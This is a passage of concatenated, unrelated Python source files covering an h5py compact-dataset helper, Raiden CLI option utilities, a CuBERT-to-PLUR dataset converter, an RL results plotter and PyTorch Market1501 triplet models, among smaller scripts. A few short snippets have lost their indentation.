assert mod["main"].body.checked_type == id_type(t)
if __name__ == "__main__":
test_dup_type()
test_id_type()
|
from __future__ import unicode_literals
__version__ = '2021.11.29'
|
from cc3d import CompuCellSetup
from .diffusion_2D_steppables_player import ExtraFieldVisualizationSteppable
CompuCellSetup.register_steppable(steppable=ExtraFieldVisualizationSteppable(frequency=10))
CompuCellSetup.run()
|
#!/usr/bin/env python
import Tkinter as Tk
root=Tk.Tk()
root.title(u"winfo")
def f_btn():
print("width=%d height=%d" % (root.winfo_width(), root.winfo_height()))
btn=Tk.Button(root, text="window size", width=30)
btn.pack()
btn["command"]=f_btn
root.mainloop()
|
# -*- coding: utf-8 -*-
# Copyright 2013 Pierre de Buyl
# Copyright 2013 Konrad Hinsen
#
# This file is part of pyh5md
#
# pyh5md is free software and is licensed under the modified BSD license (see
# LICENSE file).
# This file is based on code from the h5py project. The complete h5py license is
# available at licenses/h5py.txt, in the distribution root directory.
import numpy
import h5py
import h5py.version
from h5py import h5s, h5t, h5r, h5d
from h5py._hl import dataset
from h5py._hl.base import HLObject
from h5py._hl import filters
from h5py._hl import selections as sel
from h5py._hl import selections2 as sel2
def create_compact_dataset(loc, name, shape=None, dtype=None, data=None,
chunks=None, compression=None, shuffle=None,
fletcher32=None, maxshape=None,
compression_opts=None, fillvalue=None,
scaleoffset=None, track_times=None):
"""Create a new HDF5 dataset with a compact storage layout."""
# Convert data to a C-contiguous ndarray
if data is not None:
import h5py._hl.base
data = numpy.asarray(data, order="C", dtype=h5py._hl.base.guess_dtype(data))
# Validate shape
if shape is None:
if data is None:
raise TypeError("Either data or shape must be specified")
shape = data.shape
else:
shape = tuple(shape)
if data is not None and (numpy.product(shape) != numpy.product(data.shape)):
raise ValueError("Shape tuple is incompatible with data")
if isinstance(dtype, h5py.Datatype):
# Named types are used as-is
tid = dtype.id
dtype = tid.dtype # Following code needs this
else:
# Validate dtype
if dtype is None and data is None:
dtype = numpy.dtype("=f4")
elif dtype is None and data is not None:
dtype = data.dtype
else:
dtype = numpy.dtype(dtype)
tid = h5t.py_create(dtype, logical=1)
# Legacy
if any((compression, shuffle, fletcher32, maxshape,scaleoffset)) and chunks is False:
raise ValueError("Chunked format required for given storage options")
# Legacy
if compression is True:
if compression_opts is None:
compression_opts = 4
compression = 'gzip'
# Legacy
if compression in range(10):
if compression_opts is not None:
raise TypeError("Conflict in compression options")
compression_opts = compression
compression = 'gzip'
if h5py.version.version_tuple >= (2, 2, 0, ''):
dcpl = filters.generate_dcpl(shape, dtype, chunks, compression,
compression_opts, shuffle, fletcher32,
maxshape, None)
else:
dcpl = filters.generate_dcpl(shape, dtype, chunks, compression,
compression_opts, shuffle, fletcher32,
maxshape)
if fillvalue is not None:
fillvalue = numpy.array(fillvalue)
dcpl.set_fill_value(fillvalue)
if track_times in (True, False):
dcpl.set_obj_track_times(track_times)
elif track_times is not None:
raise TypeError("track_times must be either True or False")
dcpl.set_layout(h5d.COMPACT)
if maxshape is not None:
maxshape = tuple(m if m is not None else h5s.UNLIMITED for m in maxshape)
sid = h5s.create_simple(shape, maxshape)
dset_id = h5d.create(loc.id, None, tid, sid, dcpl=dcpl)
if data is not None:
dset_id.write(h5s.ALL, h5s.ALL, data)
dset = dataset.Dataset(dset_id)
if name is not None:
loc[name] = dset
return dset
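# A minimal usage sketch (hypothetical file name), written against the h5py 2.x API this
# module targets. HDF5's compact layout stores the raw data in the object header, so it
# only suits small datasets (roughly under 64 KiB).
if __name__ == '__main__':
    with h5py.File('compact_example.h5', 'w') as f:
        dset = create_compact_dataset(f, 'small_data', data=numpy.arange(16, dtype='f4'))
        print(dset.shape, dset.dtype)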
|
import errno
import os
import re
import sys
from ipaddress import IPv4Address, AddressValueError
from itertools import groupby
from pathlib import Path
from string import Template
from typing import Callable, List, Union, Any, Dict
import click
import pytoml
from click._compat import term_len
from click.formatting import iter_rows, measure_table, wrap_text
from pytoml import TomlError
from raiden.utils import address_checksum_and_decode
from raiden.constants import NETWORKNAME_TO_ID
from raiden.exceptions import InvalidAddress
LOG_CONFIG_OPTION_NAME = 'log_config'
class HelpFormatter(click.HelpFormatter):
"""
Subclass that allows multiple (option) sections to be formatted with pre-determined
widths.
"""
def write_dl(self, rows, col_max=30, col_spacing=2, widths=None):
"""Writes a definition list into the buffer. This is how options
and commands are usually formatted.
:param rows: a list of two item tuples for the terms and values.
:param col_max: the maximum width of the first column.
:param col_spacing: the number of spaces between the first and
second column.
:param widths: optional pre-calculated line widths
"""
rows = list(rows)
if widths is None:
widths = measure_table(rows)
if len(widths) != 2:
raise TypeError('Expected two columns for definition list')
first_col = min(widths[0], col_max) + col_spacing
for first, second in iter_rows(rows, len(widths)):
self.write('%*s%s' % (self.current_indent, '', first))
if not second:
self.write('\n')
continue
if term_len(first) <= first_col - col_spacing:
self.write(' ' * (first_col - term_len(first)))
else:
self.write('\n')
self.write(' ' * (first_col + self.current_indent))
text_width = max(self.width - first_col - 2, 10)
lines = iter(wrap_text(second, text_width).splitlines())
if lines:
self.write(next(lines) + '\n')
for line in lines:
self.write('%*s%s\n' % (
first_col + self.current_indent, '', line))
else:
self.write('\n')
class Context(click.Context):
def make_formatter(self):
return HelpFormatter(width=self.terminal_width, max_width=self.max_content_width)
class CustomContextMixin:
""" Use above context class instead of the click default """
def make_context(self, info_name, args, parent=None, **extra):
"""
This function when given an info name and arguments will kick
off the parsing and create a new :class:`Context`. It does not
invoke the actual command callback though.
        :param info_name: the info name for this invocation. Generally this
is the most descriptive name for the script or
command. For the toplevel script it's usually
the name of the script, for commands below it it's
the name of the script.
:param args: the arguments to parse as list of strings.
:param parent: the parent context if available.
:param extra: extra keyword arguments forwarded to the context
constructor.
"""
for key, value in iter(self.context_settings.items()):
if key not in extra:
extra[key] = value
ctx = Context(self, info_name=info_name, parent=parent, **extra)
with ctx.scope(cleanup=False):
self.parse_args(ctx, args)
return ctx
class GroupableOption(click.Option):
def __init__(
self,
param_decls=None,
show_default=False,
prompt=False,
confirmation_prompt=False,
hide_input=False,
is_flag=None,
flag_value=None,
multiple=False,
count=False,
allow_from_autoenv=True,
type=None,
help=None,
option_group=None,
**attrs,
):
super().__init__(
param_decls,
show_default,
prompt,
confirmation_prompt,
hide_input,
is_flag,
flag_value,
multiple,
count,
allow_from_autoenv,
type,
help,
**attrs,
)
self.option_group = option_group
class GroupableOptionCommand(CustomContextMixin, click.Command):
def format_options(self, ctx, formatter):
def keyfunc(o):
value = getattr(o, 'option_group', None)
return value if value is not None else ''
grouped_options = groupby(
sorted(
self.get_params(ctx),
key=keyfunc,
),
key=keyfunc,
)
options = {}
for option_group, params in grouped_options:
for param in params:
rv = param.get_help_record(ctx)
if rv is not None:
options.setdefault(option_group, []).append(rv)
if options:
widths_a, widths_b = list(
zip(*[measure_table(group_options) for group_options in options.values()]),
)
widths = (max(widths_a), max(widths_b))
for option_group, group_options in options.items():
with formatter.section(option_group if option_group else 'Options'):
formatter.write_dl(group_options, widths=widths)
class GroupableOptionCommandGroup(CustomContextMixin, click.Group):
def format_options(self, ctx, formatter):
GroupableOptionCommand.format_options(self, ctx, formatter)
self.format_commands(ctx, formatter)
def command(self, *args, **kwargs):
return super().command(*args, **{'cls': GroupableOptionCommand, **kwargs})
def group(self, *args, **kwargs):
return super().group(*args, **{'cls': self.__class__, **kwargs})
def command(name=None, cls=GroupableOptionCommand, **attrs):
return click.command(name, cls, **attrs)
def group(name=None, **attrs):
return click.group(name, **{'cls': GroupableOptionCommandGroup, **attrs})
def option(*args, **kwargs):
return click.option(*args, **{'cls': GroupableOption, **kwargs})
def option_group(name: str, *options: List[Callable]):
def decorator(f):
for option_ in reversed(options):
for closure_cell in option_.__closure__:
if isinstance(closure_cell.cell_contents, dict):
closure_cell.cell_contents['option_group'] = name
break
option_(f)
return f
return decorator
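# Usage sketch for the grouping helpers above (the option names are hypothetical, for
# illustration only):
#
#   @group()
#   @option_group(
#       'RPC Options',
#       option('--rpc-host', default='127.0.0.1'),
#       option('--rpc-port', type=int, default=8545),
#   )
#   def cli(**kwargs):
#       pass
#
# option_group() tags each option's keyword dict (found in the decorator's closure) with
# the group name, and GroupableOptionCommand.format_options() then renders one help
# section per group.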
class AddressType(click.ParamType):
name = 'address'
def convert(self, value, param, ctx):
try:
return address_checksum_and_decode(value)
except InvalidAddress as e:
self.fail(str(e))
class LogLevelConfigType(click.ParamType):
name = 'log-config'
_validate_re = re.compile(
r'^(?:'
r'(?P<logger_name>[a-zA-Z0-9._]+)?'
r':'
r'(?P<logger_level>debug|info|warn(?:ing)?|error|critical|fatal)'
r',?)*$',
re.IGNORECASE,
)
def convert(self, value, param, ctx):
if not self._validate_re.match(value):
self.fail('Invalid log config format')
level_config = dict()
if value.strip(' ') == '':
return None # default value
for logger_config in value.split(','):
logger_name, logger_level = logger_config.split(':')
level_config[logger_name] = logger_level.upper()
return level_config
class NATChoiceType(click.Choice):
def convert(self, value, param, ctx):
if value.startswith('ext:'):
ip, _, port = value[4:].partition(':')
try:
IPv4Address(ip)
except AddressValueError:
self.fail('invalid IP address: {}'.format(ip), param, ctx)
if port:
try:
port = int(port, 0)
except ValueError:
self.fail('invalid port number: {}'.format(port), param, ctx)
else:
port = None
return ip, port
return super().convert(value, param, ctx)
class NetworkChoiceType(click.Choice):
def convert(self, value, param, ctx):
if isinstance(value, str) and value.isnumeric():
try:
return int(value)
except ValueError:
self.fail(f'invalid numeric network id: {value}', param, ctx)
else:
network_name = super().convert(value, param, ctx)
return NETWORKNAME_TO_ID[network_name]
class MatrixServerType(click.Choice):
def convert(self, value, param, ctx):
if value.startswith('http'):
return value
return super().convert(value, param, ctx)
class HypenTemplate(Template):
idpattern = r'(?-i:[_a-zA-Z-][_a-zA-Z0-9-]*)'
class PathRelativePath(click.Path):
"""
`click.Path` subclass that can default to a value depending on
another option of type `click.Path`.
Uses :ref:`string.Template` to expand the parameters default value.
Example::
@click.option('--some-dir', type=click.Path())
@click.option('--some-file', type=PathRelativePath(), default='${some-dir}/file.txt')
"""
def convert(self, value, param, ctx):
if value == param.default:
try:
value = self.expand_default(value, ctx.params)
except KeyError as ex:
raise RuntimeError(
'Subsitution parameter not found in context. '
'Make sure it\'s defined with `is_eager=True`.' # noqa: C812
) from ex
return super().convert(value, param, ctx)
@staticmethod
def expand_default(default, params):
return HypenTemplate(default).substitute(params)
def apply_config_file(
command_function: Union[click.Command, click.Group],
cli_params: Dict[str, Any],
ctx,
config_file_option_name='config_file',
):
""" Applies all options set in the config file to `cli_params` """
paramname_to_param = {param.name: param for param in command_function.params}
path_params = {
param.name
for param in command_function.params
if isinstance(param.type, (click.Path, click.File))
}
config_file_path = Path(cli_params[config_file_option_name])
config_file_values = dict()
try:
with config_file_path.open() as config_file:
config_file_values = pytoml.load(config_file)
except OSError as ex:
# Silently ignore if 'file not found' and the config file path is the default
config_file_param = paramname_to_param[config_file_option_name]
config_file_default_path = Path(
config_file_param.type.expand_default(config_file_param.get_default(ctx), cli_params),
)
default_config_missing = (
ex.errno == errno.ENOENT and
config_file_path.resolve() == config_file_default_path.resolve()
)
if default_config_missing:
cli_params['config_file'] = None
else:
click.secho(f"Error opening config file: {ex}", fg='red')
sys.exit(1)
except TomlError as ex:
click.secho(f'Error loading config file: {ex}', fg='red')
sys.exit(1)
for config_name, config_value in config_file_values.items():
config_name_int = config_name.replace('-', '_')
if config_name_int not in paramname_to_param:
click.secho(
f"Unknown setting '{config_name}' found in config file - ignoring.",
fg='yellow',
)
continue
if config_name_int in path_params:
# Allow users to use `~` in paths in the config file
config_value = os.path.expanduser(config_value)
if config_name_int == LOG_CONFIG_OPTION_NAME:
# Uppercase log level names
config_value = {k: v.upper() for k, v in config_value.items()}
else:
# Pipe config file values through cli converter to ensure correct types
# We exclude `log-config` because it already is a dict when loading from toml
try:
config_value = paramname_to_param[config_name_int].type.convert(
config_value,
paramname_to_param[config_name_int],
ctx,
)
except click.BadParameter as ex:
click.secho(f"Invalid config file setting '{config_name}': {ex}", fg='red')
sys.exit(1)
# Use the config file value if the value from the command line is the default
if cli_params[config_name_int] == paramname_to_param[config_name_int].get_default(ctx):
cli_params[config_name_int] = config_value
ADDRESS_TYPE = AddressType()
LOG_LEVEL_CONFIG_TYPE = LogLevelConfigType()
|
def findThreeLargestNumbers(array):
# Write your code here.
numList = [None, None, None]
for i in array:
compareThreeLargest(i, numList)
return numList
def compareThreeLargest(num, numList):
if numList[2] is None or num > numList[2]:
updateList(num, 2, numList)
elif numList[1] is None or num > numList[1]:
updateList(num, 1, numList)
elif numList[0] is None or num > numList[0]:
updateList(num, 0, numList)
def updateList(num, idx, array):
for i in range(idx+1):
if idx == i:
array[i] = num
else:
array[i] = array[i+1]
# def findThreeLargestNumbers(array):
# # Write your code here.
# ordArray = []
# # O(n)
# for idx in range(3):
# maxInt = array.pop(array.index(max(array)))
# ordArray.append(maxInt)
# return ordArray[::-1]
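# Quick check of the in-place tracking approach above, using a sample input:
if __name__ == "__main__":
    print(findThreeLargestNumbers([141, 1, 17, -7, -17, -27, 18, 541, 8, 7, 7]))  # [18, 141, 541]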
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Converts the CuBERT Function Docstring Classification dataset to PLUR."""
import itertools
from typing import Any, List, Mapping, MutableSequence, Optional
from plur.stage_1 import cubert_dataset
from plur.utils.graph_to_output_example import GraphToOutputExample
from cubert import code_to_subtokenized_sentences
def _truncate_seq_pair(tokens_a: MutableSequence[str],
tokens_b: MutableSequence[str], max_length: int) -> None:
"""BERT's truncation of two token sequences."""
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
class CuBertFunctionDocstringClassificationDataset(cubert_dataset.CuBertDataset
):
"""Converts CuBERT Function Docstring Classification data to a PLUR dataset.
The dataset is created by: Aditya Kanade, Petros Maniatis, Gogul Balakrishnan,
Kensen Shi Proceedings of the 37th International Conference on Machine
Learning, PMLR 119:5110-5121, 2020.
The task is to predict whether a function and a docstring match, or if they
come from distinct contexts.
The context consists of the body of a Python function and a docstring. This
context is tokenized using the CuBERT Python tokenizer, and encoded as
WordPiece vocabulary IDs from the CuBERT-released Python vocabulary. The graph
representation is as a chain of nodes, each holding a WordPiece subtoken. The
output is one of the two classification labels. We use separate node types
for docstrings and for function bodies.
"""
ALL_CLASSES = frozenset((
'Correct',
'Incorrect',
))
def folder_path(self) -> str:
"""As per superclass."""
return '20200621_Python/function_docstring_datasets/'
def dataset_name(self) -> str:
"""As per superclass."""
return 'cubert_function_docstring_classification_dataset'
def dataset_description(self) -> str:
"""As per superclass."""
return """From CuBERT website:
Here we describe the 6 Python benchmarks we created. All 6 benchmarks were
derived from ETH Py150 Open. All examples are stored as sharded text files.
Each text line corresponds to a separate example encoded as a JSON object. For
each dataset, we release separate training/validation/testing splits along the
same boundaries that ETH Py150 Open splits its files to the corresponding
splits. The fine-tuned models are the checkpoints of each model with the
highest validation accuracy.
Combinations of functions with their correct or incorrect documentation
string, used to train a classifier that can tell which pairs go together. The
JSON fields are:
function: string, the source code of a function as text
docstring: string, the documentation string for that function
label: string, one of (“Incorrect”, “Correct”), the label of the example.
info: string, an unformatted description of how the example was constructed,
including the source dataset (always “ETHPy150Open”), the repository and
filepath, the function name and, for “Incorrect” examples, the function
whose docstring was substituted.
"""
def data_to_graph_to_output_example(
self, data: Mapping[str, Any],
max_graph_size: int,
split: str) -> Optional[GraphToOutputExample]:
"""Convert data example to the unified GraphToOutputExample data structure.
    The input is a function paired with a docstring, and the output is a
    classification label. There are no edges in this task, since it was
    targeting BERT.
Args:
data: A dictionary with 'function', 'docstring', 'label', and 'info' as
keys.
max_graph_size: The maximum number of input nodes allowed for the example.
split: The split of the example.
Raises:
GraphToOutputExampleNotValidError if the GraphToOutputExample is not
valid.
Returns:
A GraphToOutputExample.
"""
del split # Unused.
function = data['function']
docstring = data['docstring']
label = data['label']
assert label in self.ALL_CLASSES
provenance = data['info']
graph_to_output_example = GraphToOutputExample()
# The input graph nodes are the source code tokens and docstring. We don't
# filter any examples based on size. Instead, we trim the suffix of the
# source-code sequence or docstring sequence, whichever is longest. This is
# the same logic used by BERT for two-context examples. Note that we trim so
# that the number of tokens plus the three delimiters (one extra between
# function and docstring) is at most `max_graph_size`.
sentences: List[List[str]] = (
code_to_subtokenized_sentences.code_to_cubert_sentences(
function, self.tokenizer, self.subword_text_encoder))
    docstring_sentences: List[List[str]] = (
        code_to_subtokenized_sentences.code_to_cubert_sentences(
            f'"""{docstring}"""', self.tokenizer, self.subword_text_encoder))
    docstring_tokens = sum(docstring_sentences, [])
    function_tokens = sum(sentences, [])
# This updates `docstring_tokens` and `function_tokens` in place.
_truncate_seq_pair(docstring_tokens, function_tokens, max_graph_size - 3)
number_of_docstring_tokens = len(docstring_tokens)
number_of_function_tokens = len(function_tokens)
delimited_tokens = tuple(itertools.chain(('[CLS]_',), docstring_tokens,
('[SEP]_',), function_tokens,
('[SEP]_',)))
types = tuple(['DOCSTRING'] * (number_of_docstring_tokens + 2) +
['TOKEN'] * (number_of_function_tokens + 1))
assert len(types) == len(delimited_tokens)
assert len(delimited_tokens) <= max_graph_size
for index, (token, token_type) in enumerate(zip(delimited_tokens, types)):
graph_to_output_example.add_node(
node_id=index, node_type=token_type, node_label=token)
graph_to_output_example.add_class_output(label)
graph_to_output_example.set_provenance(provenance)
return graph_to_output_example
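# A minimal, illustrative sketch (not part of the original converter): it shows
# how `_truncate_seq_pair` trims the longer of the two token sequences so that
# the tokens plus the three delimiters ([CLS]_ and two [SEP]_) fit within a
# hypothetical `max_graph_size`. The token values below are made up.
if __name__ == '__main__':
  example_docstring_tokens = ['returns_', 'the_', 'sum_', 'of_', 'two_', 'numbers_']
  example_function_tokens = ['def_', 'add_', '(_', 'a_', ',_', 'b_', ')_', ':_',
                             'return_', 'a_', '+_', 'b_']
  example_max_graph_size = 12
  _truncate_seq_pair(example_docstring_tokens, example_function_tokens,
                     example_max_graph_size - 3)
  # The longer sequence (the function body) is trimmed from its suffix first.
  assert (len(example_docstring_tokens) + len(example_function_tokens) + 3
          <= example_max_graph_size)
  print(example_docstring_tokens, example_function_tokens)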
|
def say_hello():
print("Hello World!")
def say_hello_with_name(name):
print(f"Hello {name}!")
|
from funcoes import Funções
import os
class Personagem:
def __init__(self, nome, altura, atributo):
self.nome = nome
self.altura = altura
self.atributo = atributo
    def escolhaAtributo(self):
        """Shows a short description of the chosen attribute and waits for the player to continue."""
        func = Funções(genero='')
        if self.atributo == 'Força':
            # tecla.play(-1)
            frase = f'You chose {self.atributo}, cabrunco, you may have an easier time dragging heavy objects!\n\n'
            func.animation(frase)
            input("press enter to continue...")
            # tecla.stop()
            os.system('clear')
        elif self.atributo == 'Velocidade':
            # tecla.play(-1)
            frase = f'You chose {self.atributo}, cabrunco, you will lose less time on every choice\n\n'
            func.animation(frase)
            # tecla.stop()
            input("press enter to continue...")
            os.system('clear')
        elif self.atributo == 'Inteligência':
            # tecla.play(-1)
            frase = f'You chose {self.atributo}, cabrunco, you think outside the box! And you will get a few hints!\n\n'
            func.animation(frase)
            # tecla.stop()
            input("press enter to continue...")
            os.system('clear')
        elif self.atributo == 'Sorte':
            # tecla.play(-1)
            frase = f'You chose {self.atributo}, cabrunco, you may get special choices!\n\n'
            func.animation(frase)
            # tecla.stop()
            input("press enter to continue...")
            os.system('clear')
|
# -*- coding: utf-8 -*-
import re
import numpy as np
from math import factorial as fac
def numgrab(string, delim=' '):
"""Find the numerical values in a string
"""
strspl = re.split(delim, string)
numlist = []
for s in strspl:
try:
numlist.append(float(s))
        except ValueError:
            # Skip tokens that are not numeric
            pass
return numlist
def arraybin2(arr, rowbin=1, colbin=1):
"""
Binning a 2D array
:Parameters:
arr : numpy array
array to bin
rowbin : int | 1
row binning
colbin : int | 1
column binning
:Return:
arrbinned : numpy array
binned array
"""
    oldr, oldc = arr.shape
    newr, newc = oldr//rowbin, oldc//colbin
    # Crop so that the dimensions are exact multiples of the bin sizes,
    # otherwise the reshape below would fail for non-divisible shapes
    arr = arr[:newr*rowbin, :newc*colbin]
    shape = (newr, rowbin, newc, colbin)
    arrbinned = arr.reshape(shape).mean(-1).mean(1)
    return arrbinned
def cnr(n, r):
""" Calculate the combinatorial coefficient
"""
    coef = fac(n) // (fac(r) * fac(n - r))
    return coef
def gram_schmidt(M, axis=1):
""" Gram-Schmidt orthonormalization of vectors using QR decomposition
"""
M = np.moveaxis(M, axis, 1)
Q, _ = np.linalg.qr(M)
return Q
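# A minimal usage sketch (not part of the original module), run only when the
# file is executed directly. The values below are arbitrary examples.
if __name__ == '__main__':
    print(numgrab('T = 300.5 K, p = 1.2 bar'))  # -> [300.5, 1.2]; non-numeric tokens are skipped
    print(arraybin2(np.arange(16).reshape(4, 4), rowbin=2, colbin=2))  # 2x2 array of block means
    print(cnr(5, 2))  # -> 10
    Q = gram_schmidt(np.random.rand(4, 3))
    print(np.allclose(Q.T @ Q, np.eye(3)))  # columns are orthonormal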
|
import glob
import os
import pickle
import numpy as np
import seaborn as sns
from tqdm import tqdm
from matplotlib import pyplot as plt
# Get all event* runs from logging_dir subdirectories
logging_dir = './storage/'
plot_dir = './plots'
clrs = sns.color_palette("husl", 5)
if not os.path.isdir(plot_dir):
os.mkdir(plot_dir)
use_cache = False
result_paths = []
eval_result_paths = []
def walklevel(some_dir, level=1):
    """Like os.walk, but descends at most `level` directory levels below `some_dir`."""
    some_dir = some_dir.rstrip(os.path.sep)
assert os.path.isdir(some_dir)
num_sep = some_dir.count(os.path.sep)
for root, dirs, files in os.walk(some_dir):
yield root, dirs, files
num_sep_this = root.count(os.path.sep)
if num_sep + level <= num_sep_this:
del dirs[:]
for root, exp_dirs, files in walklevel(logging_dir):
for exp_dir in exp_dirs:
for seed_dir in os.listdir(root + "/" + exp_dir):
result_paths.extend(glob.glob(os.path.join(root, exp_dir, seed_dir, "results.pkl")))
eval_result_paths.extend(glob.glob(os.path.join(root, exp_dir, seed_dir, "eval_results.pkl")))
def print_plot(metric, all_logs):
fig, ax = plt.subplots()
with sns.axes_style("darkgrid"):
for method_name, logs in all_logs.items():
print(f"{method_name}, {metric}")
data = []
for seed in range(len(logs)):
data.append(logs[seed][metric])
print(f"seed: {seed}, len: {len(logs[seed][metric])}")
data = np.array(data)
ax.plot(range(len(data[0])), data.mean(axis=0), label=method_name)# c=clrs[i])
ax.fill_between(range(len(data[0])), data.mean(axis=0)-data.std(axis=0), data.mean(axis=0)+data.std(axis=0), alpha=0.3)#, facecolor=clrs[i])
plt.ylabel(metric)
plt.xlabel("Updates")
plt.legend()
plt.savefig(f"{plot_dir}/{metric}")
plt.clf()
# Call & append
all_logs = {}
all_eval_logs = {}
if not use_cache:
for path in result_paths:
method_name = path.split("/")[2]
seed = path.split("/")[3]
if not all_logs.get(method_name):
all_logs[method_name] = []
log = pickle.load(open(path, 'rb'))
all_logs[method_name].append(log)
pickle.dump(all_logs, open("storage/all_logs.pkl", 'wb'))
for path in eval_result_paths:
method_name = path.split("/")[2]
seed = path.split("/")[3]
if not all_eval_logs.get(method_name):
all_eval_logs[method_name] = []
log = pickle.load(open(path, 'rb'))
all_eval_logs[method_name].append(log)
pickle.dump(all_eval_logs, open("storage/all_eval_logs.pkl", 'wb'))
if use_cache:
all_logs = pickle.load(open("storage/all_logs.pkl", 'rb'))
all_eval_logs = pickle.load(open("storage/all_eval_logs.pkl", 'rb'))
print_plot("value", all_logs)
print_plot("policy_loss", all_logs)
print_plot("value_loss", all_logs)
print_plot("return_mean", all_logs)
print_plot("rreturn_mean", all_logs)
print_plot("FPS", all_logs)
print_plot("eval_return_per_episode", all_eval_logs)
print_plot("num_frames_per_episode", all_eval_logs)
|
"""
MIT License
Copyright (c) 2021 Thomas Leong
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import torch
import torch.nn.functional as F
from torch import nn
class Market1501TripletModel(nn.Module):
MODEL_NAME = "Self-made cnn"
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size,
max_pool_kernel_size,
dropout_rate,
filters=64,
):
super(Market1501TripletModel, self).__init__()
blocks = []
start_block = self.__conv_block(
in_channels=input_shape[1],
out_channels=filters,
conv_kernel_size=conv_kernel_size,
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate
)
for _ in range(conv_blocks - 1):
blocks.append(self.__conv_block(
in_channels=filters,
out_channels=filters,
conv_kernel_size=conv_kernel_size,
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate
))
self.backbone = nn.Sequential(
start_block,
*blocks,
nn.Flatten(),
)
backbone_output_features = self.backbone(torch.rand(input_shape)).shape[-1]
self.fully_connected = nn.Sequential(
nn.Linear(in_features=backbone_output_features, out_features=256),
nn.ReLU(),
nn.Linear(in_features=256, out_features=128),
nn.ReLU(),
nn.Linear(in_features=128, out_features=embedding_dim)
)
self.model = nn.Sequential(self.backbone, self.fully_connected)
@staticmethod
def __conv_block(in_channels, out_channels, conv_kernel_size, max_pool_kernel_size, dropout_rate):
return nn.Sequential(
nn.Conv2d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=conv_kernel_size,
padding='same',
),
nn.ReLU(),
nn.MaxPool2d(kernel_size=max_pool_kernel_size),
nn.Dropout(dropout_rate),
)
def forward(self, anchor, true_positive, false_positive):
embedding_anchor = self.model(anchor)
embedding_true = self.model(true_positive)
embedding_false = self.model(false_positive)
anchor_positive_dist = F.pairwise_distance(embedding_anchor, embedding_true)
anchor_negative_dist = F.pairwise_distance(embedding_anchor, embedding_false)
return anchor_positive_dist, anchor_negative_dist
class Market1501TripletMiniVGG(nn.Module):
INITIAL_FILTERS = 32
MODEL_NAME = "Mini-VGG"
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size=(3, 3),
max_pool_kernel_size=(2, 2),
dropout_rate=0.03,
filters=64
):
super(Market1501TripletMiniVGG, self).__init__()
self.model_name = "Mini-VGG"
start_block = self.__conv_block(
in_channels=input_shape[1],
out_channels=Market1501TripletMiniVGG.INITIAL_FILTERS,
conv_kernel_size=conv_kernel_size,
)
self.backbone = nn.Sequential(start_block)
assert conv_blocks % 2 == 0, "Conv blocks must be an even number in MiniVGGNet"
for idx in range(2, conv_blocks + 1):
current_filters_multiply = int(round((idx / 2) + 0.1, 0))
current_filters = Market1501TripletMiniVGG.INITIAL_FILTERS * current_filters_multiply
_, last_output_channels, _, _ = self.__get_last_shape(input_shape, self.backbone)
self.backbone.add_module(f'Block:{idx}', self.__conv_block(
in_channels=last_output_channels,
out_channels=current_filters,
conv_kernel_size=conv_kernel_size,
))
if idx % 2 == 0:
self.backbone.add_module(f'Pool:{current_filters_multiply}', self.__pool_block(
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate
))
self.backbone.add_module('Flatten', nn.Flatten())
backbone_output_features = self.__get_last_shape(input_shape, self.backbone)[-1]
self.fully_connected = nn.Sequential(
nn.Linear(in_features=backbone_output_features, out_features=512),
nn.ReLU(),
nn.BatchNorm1d(num_features=512),
nn.Linear(in_features=512, out_features=128),
nn.ReLU(),
nn.BatchNorm1d(num_features=128),
nn.Linear(in_features=128, out_features=embedding_dim)
)
self.model = nn.Sequential(self.backbone, self.fully_connected)
@staticmethod
def __get_last_shape(input_shape, block):
return block(torch.rand(input_shape)).shape
@staticmethod
def __pool_block(max_pool_kernel_size, dropout_rate):
return nn.Sequential(
nn.MaxPool2d(kernel_size=max_pool_kernel_size),
nn.Dropout(p=dropout_rate)
)
@staticmethod
def __conv_block(in_channels, out_channels, conv_kernel_size):
return nn.Sequential(
nn.Conv2d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=conv_kernel_size,
padding='same',
bias=True
),
nn.ReLU(),
nn.BatchNorm2d(num_features=out_channels)
)
def forward(self, anchor, positive, negative):
anchor_emd = self.model(anchor)
positive_emd = self.model(positive)
negative_emd = self.model(negative)
anchor_positive_dist = F.pairwise_distance(anchor_emd, positive_emd)
anchor_negative_dist = F.pairwise_distance(anchor_emd, negative_emd)
return anchor_positive_dist, anchor_negative_dist
class Market1501TripletModelEval(Market1501TripletModel):
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size=(3, 3),
max_pool_kernel_size=(2, 2),
dropout_rate=0.03,
filters=64
):
super(Market1501TripletModelEval, self).__init__(
input_shape=input_shape,
embedding_dim=embedding_dim,
conv_blocks=conv_blocks,
conv_kernel_size=conv_kernel_size,
